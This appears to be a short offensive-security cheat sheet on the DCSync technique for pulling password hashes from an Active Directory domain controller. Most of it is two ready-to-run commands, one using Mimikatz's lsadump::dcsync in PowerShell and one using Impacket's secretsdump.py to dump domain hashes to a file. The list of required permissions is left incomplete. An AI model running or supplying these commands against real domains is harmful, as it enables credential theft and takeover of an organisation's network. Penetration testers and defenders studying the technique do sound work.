It’s used to extract Hash credentials from the DC without code execution on it, we can use DCSync.

⚠️ It’s necessary to have Domain Admin privileges or the following permissions:

Powershell:

Invoke-Mimikatz -command '"lsadump::dcsync /user:<domain>\\<user_service>"'

Linux:

secretsdump.py -just-dc 'domain/user':'password'@<IP> -outputfile dcsync_hashes